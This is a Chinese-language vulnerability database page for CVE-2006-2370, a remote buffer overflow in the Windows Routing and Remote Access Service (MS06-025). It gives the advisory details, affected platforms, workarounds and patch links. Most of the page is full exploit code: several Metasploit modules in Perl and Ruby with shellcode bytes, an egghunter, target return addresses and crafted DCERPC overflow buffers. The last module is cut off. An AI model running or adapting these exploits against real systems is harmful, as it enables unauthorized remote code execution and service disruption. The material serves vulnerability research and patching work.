CVE-2006-2370
CVSS7.5
发布时间 :2006-06-13 15:06:00
修订时间 :2011-03-07 21:36:04
NMCOEPS    

[原文]Buffer overflow in the Routing and Remote Access service (RRAS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows remote unauthenticated or authenticated attackers to execute arbitrary code via certain crafted "RPC related requests," aka the "RRAS Memory Corruption Vulnerability."


[CNNVD]Microsoft Windows 路由和远程访问服务 缓冲区溢出漏洞(CNNVD-200606-291)

        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows 2000 SP4, XP SP1 和SP2,和Server 2003 SP1和以前的版本中的Routing and Remote Access service (RRAS)存在缓存溢出。远程攻击者可以通过特制的RPC请求触发Microsoft Windows路由和远程访问服务(RRAS)中的缓冲区溢出,导致执行任意指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2003_server:standard:sp1
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2003_server:datacenter_edition_64-bit:sp1
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2003_server:datacenter_edition
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2003_server:standard_64-bit
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2003_server:standard
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2003_server:datacenter_edition_64-bit
cpe:/o:microsoft:windows_2003_server:sp1::enterprise
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2003_server:enterprise_edition:sp1
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2003_server:datacenter_edition:sp1
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2003_server:enterprise_edition_64-bit:sp1
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_xp::sp2:media_centerMicrosoft windows xp_sp2 media_center
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_2003_server:enterprise_edition_64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2003_server:web:sp1
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:2061RRAS Memory Corruption Vulnerability (WinXP,SP1)
oval:org.mitre.oval:def:1936RRAS Memory Corruption Vulnerability (S03,SP1)
oval:org.mitre.oval:def:1823RRAS Memory Corruption Vulnerability (WinXP,SP2)
oval:org.mitre.oval:def:1741RRAS Memory Corruption Vulnerability (Win2K)
oval:org.mitre.oval:def:1720RRAS Memory Corruption Vulnerability (WinS03)
oval:org.mitre.oval:def:1587RRAS Memory Corruption Vulnerability (64-bit XP)
oval:gov.nist.fdcc.patch:def:44MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280)
oval:gov.nist.USGCB.patch:def:44MS06-025: Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2370
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2370
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-291
(官方数据源) CNNVD

- 其它链接及资源

http://www.us-cert.gov/cas/techalerts/TA06-164A.html
(UNKNOWN)  CERT  TA06-164A
http://www.kb.cert.org/vuls/id/631516
(UNKNOWN)  CERT-VN  VU#631516
http://www.securityfocus.com/bid/18325
(PATCH)  BID  18325
http://www.osvdb.org/26437
(PATCH)  OSVDB  26437
http://www.microsoft.com/technet/security/bulletin/ms06-025.mspx
(VENDOR_ADVISORY)  MS  MS06-025
http://secunia.com/advisories/20630
(VENDOR_ADVISORY)  SECUNIA  20630
http://www.vupen.com/english/advisories/2006/2323
(UNKNOWN)  VUPEN  ADV-2006-2323
http://securitytracker.com/id?1016285
(UNKNOWN)  SECTRACK  1016285
http://xforce.iss.net/xforce/xfdb/26812
(UNKNOWN)  XF  win-rras-bo(26812)

- 漏洞信息

Microsoft Windows 路由和远程访问服务 缓冲区溢出漏洞
高危 缓冲区溢出
2006-06-13 00:00:00 2006-11-30 00:00:00
远程  
        Microsoft Windows是微软发布的非常流行的操作系统。
        Microsoft Windows 2000 SP4, XP SP1 和SP2,和Server 2003 SP1和以前的版本中的Routing and Remote Access service (RRAS)存在缓存溢出。远程攻击者可以通过特制的RPC请求触发Microsoft Windows路由和远程访问服务(RRAS)中的缓冲区溢出,导致执行任意指令。

- 公告与补丁

        临时解决方法:
        * 禁用远程访问连接管理器服务。
        * 在防火墙阻断:
         UDP端口135、137、138、445,以及TCP端口135、139、445、593
         所有大于1024端口上的未经请求的入站通讯
         任何其他明确配置的RPC端口
        * 使用个人防火墙,如Windows XP和Windows Server 2003捆绑的Internet连接防火墙。
        * 在支持的系统上启用高级TCP/IP过滤功能。
        * 在受影响的系统上使用IPSec阻断受影响的端口。
        Microsoft已经为此发布了一个安全公告(MS06-025)以及相应补丁:
        MS06-025:Vulnerability in Routing and Remote Access Could Allow Remote Code Execution (911280)
        链接:
        http://www.microsoft.com/technet/security/Bulletin/MS06-025.mspx

- 漏洞信息 (1965)

MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) (EDBID:1965)
windows remote
2006-06-29 Verified
445 Pusscat
N/A [点击下载]
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025_rasman;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::SMB;
use Pex::NDR;

my $advanced = {
	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
  };

my $info = {
	'Name'    => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
	'Version' => '$Revision: 1.1 $',
	'Authors' =>
	  [
		'Pusscat <pusscat [at] gmail.com>',
		'H D Moore <hdm [at] metasploit.com>'
	  ],

	'Arch' => ['x86'],
	'OS'   => [ 'win32', 'win2000', 'winxp' ],
	'Priv' => 1,

	'AutoOpts' => { 'EXITFUNC' => 'thread' },
	'UserOpts' =>
	  {
		'RHOST' => [ 1, 'ADDR', 'The target address' ],

		# SMB connection options
		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
		'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
	  },

	'Payload' =>
	  {
		'Space'    =>1024,
		'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",

		# sub esp, 4097 + inc esp makes stack happy
		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
	  },

	'Description' => Pex::Text::Freeform(
		qq{
    		This module exploits a registry-based stack overflow in the Windows Routing 
			and Remote Access Service. Since the service is hosted inside svchost.exe, 
			a failed exploit attempt can cause other system services to fail as well. 
			A valid username and password is required to exploit this flaw on Windows 2000. 
			When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
			Exploiting this flaw involves two distinct steps - creating the registry key
			and then triggering an overwrite based on a read of this key. Once the key is
			created, it cannot be recreated. This means that for any given system, you
			only get one chance to exploit this flaw. Picking the wrong target will require
			a manual removal of the following registry key before you can try again:
			HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
}
	  ),

	'Refs' =>
	  [
		[ 'BID', '18325' ],
		[ 'CVE', '2006-2370' ],
		[ 'OSVDB', '26437' ],
		[ 'MSB', 'MS06-025' ]
	  ],

	'DefaultTarget' => 0,
	'Targets'       =>
	  [
		[ 'Automatic' ],
		[ 'Windows 2000',   0x750217ae ], # call esi
	  ],

	'Keys' => ['rras'],

	'DisclosureDate' => 'Jun 13 2006',
  };

sub new {
	my ($class) = @_;
	my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
	return ($self);
}

sub Exploit {
	my ($self)      = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];

	my $FragSize = $self->GetVar('FragSize') || 256;
	my $target   = $self->Targets->[$target_idx];

	my ( $res, $rpc );

	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
	my $version = '1.0';

	my $handle =
	  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
		$pipe );

	my $dce = Pex::DCERPC->new(
		'handle'      => $handle,
		'username'    => $self->GetVar('SMBUSER'),
		'password'    => $self->GetVar('SMBPASS'),
		'domain'      => $self->GetVar('SMBDOM'),
		'fragsize'    => $self->GetVar('FragSize'),
		'bindevasion' => $self->GetVar('BindEvasion'),
		'directsmb'   => $self->GetVar('DirectSMB'),
	  );

	if ( !$dce ) {
		$self->PrintLine("[*] Could not bind to $handle");
		return;
	}

	my $smb = $dce->{'_handles'}{$handle}{'connection'};
	if ( $target->[0] =~ /Auto/ ) {
		if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
			$target = $self->Targets->[1];
			$self->PrintLine('[*] Detected a Windows 2000 target...');
		}
		#elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
		#	$target = $self->Targets->[2];
		#	$self->PrintLine('[*] Detected a Windows XP target...');
		#}
		else {
			$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
			return;
		}
	}

	# Shiny new egghunt from the 3.0 code :-)
	my $egghunt =
	  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
	  "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
	  "\x41\x41\x41\x41".
	  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

	# Pick a "filler" character that we know doesn't get mangled
	# by the wide string conversion routines
	my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
	my $filler  = substr($fillset, rand(length($fillset)), 1);
	my $eggtag  = '';
	my $pattern = '';

	while (length($eggtag) < 4) {
		$eggtag .= substr($fillset, rand(length($fillset)), 1);
	}

	# Configure the egg
	substr($egghunt, 0x12, 4, $eggtag);

	# We use an egghunter to give us nearly unlimited room for shellcode
	my $eggdata =
	  ($filler x 1024).
	  $eggtag.
	  $eggtag.
	  $shellcode.
	  ($filler x 1024);

	# Mini-payload that launches the egghunt
	my $bof = $filler x 178;
	substr($bof, 84, length($egghunt), $egghunt);

	# Base pointer override occurs with this string
	my $pat =
	  ($filler x 886).
	  pack('V', $target->[1]).
	  ($filler x 3). "\xc0".
	  $bof;

	# The vulnerability is triggered with the second field of this structure
	my $type2 =
	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
	  Pex::NDR::Long( int(rand(0xffffffff)) ).
	  Pex::NDR::Long( int(rand(0xffffffff)) );

	# Another gigantic structure, many of these fields up as registry values
	my $type1 =
	  Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
	  Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
	  Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
	  Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
	  Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
	  Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
	  Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
	  Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
	  Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
	  Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
	  Pex::NDR::Long(0x45).
	  $type2.
	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  Pex::NDR::Long(int(rand(0xffffffff)));

	# Create the actual RPC stub and tack our payload on the end
	my $stub =
	  $type1.
	  Pex::NDR::Long(int(rand(0xffffffff))).
	  $eggdata;

	$self->PrintLine("[*] Creating the malicious registry key...");
	my @response = $dce->request( $handle, 0x0A, $stub );

	$self->PrintLine("[*] Triggering the base pointer overwrite...");
	my @response = $dce->request( $handle, 0x0A, $stub );

	if (@response) {
		$self->PrintLine('[*] RPC server responded with:');
		foreach my $line (@response) {
			$self->PrintLine( '[*] ' . $line );
		}
		$self->PrintLine('[*] This probably means that the system is patched');
	}
	return;
}

1;

# milw0rm.com [2006-06-29]
		

- 漏洞信息 (16364)

Microsoft RRAS Service Overflow (EDBID:16364)
windows remote
2010-05-09 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms06_025_rras.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RRAS Service Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Windows Routing and Remote
				Access Service. Since the service is hosted inside svchost.exe, a failed
				exploit attempt can cause other system services to fail as well. A valid
				username and password is required to exploit this flaw on Windows 2000.
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
			'Author'         =>
				[
					'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1104,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
					[ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
				],

			'DisclosureDate' => 'Jun 13 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
			], self.class)
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end

	def exploit

		connect()
		smb_login()

		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])

		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")


		print_status('Getting OS...')

		# Check the remote OS name and version
		os = smb_peer_os
		pat = ''

		case os
		when /Windows 5\.0/
			pat =
				payload.encoded +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				"\xe9\xb7\xfb\xff\xff"
			os = 'Windows 2000'
		when /Windows 5\.1/
			pat =
				rand_text_alphanumeric(0x4c) +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				payload.encoded
			os = 'Windows XP'
		end

		req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
		len = req.length
		stb =
			NDR.long(0x20000) +
			NDR.long(len) +
			req           +
			NDR.long(len)

		print_status("Calling the vulnerable function on #{os}...")

		begin
			dcerpc.call(0x0C, stb)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
		

- 漏洞信息 (16375)

Microsoft RRAS Service RASMAN Registry Overflow (EDBID:16375)
windows remote
2010-08-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: ms06_025_rasmans_reg.rb 10150 2010-08-25 20:55:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft RRAS Service RASMAN Registry Overflow',
			'Description'    => %q{
					This module exploits a registry-based stack buffer overflow in the Windows Routing
				and Remote Access Service. Since the service is hosted inside svchost.exe,
				a failed exploit attempt can cause other system services to fail as well.
				A valid username and password is required to exploit this flaw on Windows 2000.
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
				Exploiting this flaw involves two distinct steps - creating the registry key
				and then triggering an overwrite based on a read of this key. Once the key is
				created, it cannot be recreated. This means that for any given system, you
				only get one chance to exploit this flaw. Picking the wrong target will require
				a manual removal of the following registry key before you can try again:
				HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
			},
			'Author'         => [ 'pusscat', 'hdm' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 10150 $',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ]
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ],  # call esi
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jun 13 2006'))

		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "Rawr.", 'router']),
			], self.class)
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end

	def exploit
		connect()
		smb_login()
		print_status("Trying target #{target.name}...")

		# Generate the egghunter payload
		hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
		egg    = hunter[1]

		# Pick a "filler" character that we know doesn't get mangled
		# by the wide string conversion routines
		filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
		fil    = filset[ rand(filset.length) ].chr

		# Bind to the actual DCERPC interface
		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		print_status("Binding to #{handle}")
		dcerpc_bind(handle)
		print_status("Bound to #{handle}")

		# Add giant blocks of guard data before and after the egg
		eggdata  =
			fil * 1024 +
			egg +
			fil * 1024

		# Place the egghunter where ESI happens to point
		bof = (fil * 178)
		bof[84, hunter[0].length] = hunter[0]

		# Overwrite the SEH ptr, even though ESP is smashed
		# The handle after the ret must be an invalid address
		pat =
			(fil * 886) +
			NDR.long(target.ret) +
			(fil * 3) + "\xc0" +
			bof

		type2 =
			NDR.string( (fil * 1024) + "\x00" ) +
			NDR.string( pat + "\x00" ) +
			NDR.string( (fil * 4096) + "\x00" ) +
				NDR.long(rand(0xffffffff)) +
				NDR.long(rand(0xffffffff))

		type1 =
			NDR.long(rand(0xffffffff)) + # OperatorDial
			NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
			NDR.long(rand(0xffffffff)) + # UseLocation
			NDR.long(rand(0xffffffff)) + # ShowLights
			NDR.long(rand(0xffffffff)) + # ShowConnectStatus
			NDR.long(rand(0xffffffff)) + # CloseOnDial
			NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
			NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
			NDR.long(rand(0xffffffff)) + # SkipConnectComplete
			NDR.long(rand(0xffffffff)) + # NewEntryWizard
			NDR.long(rand(0xffffffff)) + # RedialAttempts
			NDR.long(rand(0xffffffff)) + # RedialSeconds
			NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
			NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
			NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
			NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
			NDR.long(rand(0xffffffff)) + # CallbackMode

			NDR.long(0x45) + type2 +     # Parsed by CallbackListFromRpc
			NDR.wstring("\x00" * 129)  +
			NDR.long(rand(0xffffffff)) +
			NDR.wstring("\x00" * 520)  +
			NDR.wstring("\x00" * 520)  +

			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +
			NDR.long(rand(0xffffffff)) +

			NDR.string("\x00" * 514) +

			NDR.long(rand(0xffffffff)) +
				NDR.long(rand(0xffffffff))

		stubdata =
			type1 +
			NDR.long(rand(0xffffffff)) +
			eggdata

		print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

		begin
			print_status('Creating the malicious registry key...')
			response = dcerpc.call(0xA, stubdata)

			print_status('Attempting to trigger the base pointer overwrite...')
			response = dcerpc.call(0xA, stubdata)

		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end

		

- 漏洞信息 (F83149)

Microsoft RRAS Service RASMAN Registry Overflow (PacketStormID:F83149)
2009-11-26 00:00:00
H D Moore,Pusscat  metasploit.com
exploit,remote,overflow,registry
windows,2k
CVE-2006-2370
[点击下载]

This Metasploit module exploits a registry-based stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000. When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'. Exploiting this flaw involves two distinct steps - creating the registry key and then triggering an overwrite based on a read of this key. Once the key is created, it cannot be recreated. This means that for any given system, you only get one chance to exploit this flaw. Picking the wrong target will require a manual removal of the following registry key before you can try again: HKEY_USERS\\\\.DEFAULT\\\\Software\\\\Microsoft\\\\RAS Phonebook

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft RRAS Service RASMAN Registry Overflow',
			'Description'    => %q{
        		This module exploits a registry-based stack overflow in the Windows Routing 
				and Remote Access Service. Since the service is hosted inside svchost.exe, 
				a failed exploit attempt can cause other system services to fail as well. 
				A valid username and password is required to exploit this flaw on Windows 2000. 
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
				Exploiting this flaw involves two distinct steps - creating the registry key
				and then triggering an overwrite based on a read of this key. Once the key is
				created, it cannot be recreated. This means that for any given system, you
				only get one chance to exploit this flaw. Picking the wrong target will require
				a manual removal of the following registry key before you can try again:
				HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
            },
			'Author'         => [ 'pusscat', 'hdm' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ] 
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 512,
					'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x750217ae } ],  # call esi
				],
			'DefaultTarget' => 0))
		register_options(
			[       
				OptString.new('SMBPIPE', [ true,  "Rawr.", 'router']),
			], self.class)		
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end
	
	def exploit
		connect()
		smb_login()
		print_status("Trying target #{target.name}...")

		# Generate the egghunter payload
		hunter = generate_egghunter()
		egg    = hunter[1]
		
		# Pick a "filler" character that we know doesn't get mangled
		# by the wide string conversion routines		
		filset = "\xc1\xff\x67\x1b\xd3\xa3\xe7"
		fil    = filset[ rand(filset.length) ].chr
		
		# Bind to the actual DCERPC interface
		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		print_status("Binding to #{handle}")
		dcerpc_bind(handle)
		print_status("Bound to #{handle}")

		# Add giant blocks of guard data before and after the egg 
		eggdata  = 
			fil * 1024 +
			egg + 
			egg + 
			payload.encoded + 
			fil * 1024
			
		# Place the egghunter where ESI happens to point
		bof = (fil * 178)
		bof[84, hunter[0].length] = hunter[0]
		
		# Overwrite the SEH ptr, even though ESP is smashed
		# The handle after the ret must be an invalid address
        pat = 
			(fil * 886) + 
			NDR.long(target.ret) + 
			(fil * 3) + "\xc0" +
			bof
			
        type2 = 
			NDR.string( (fil * 1024) + "\x00" ) +
			NDR.string( pat + "\x00" ) +
			NDR.string( (fil * 4096) + "\x00" ) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) 
          
        type1 = 
            NDR.long(rand(0xffffffff)) + # OperatorDial
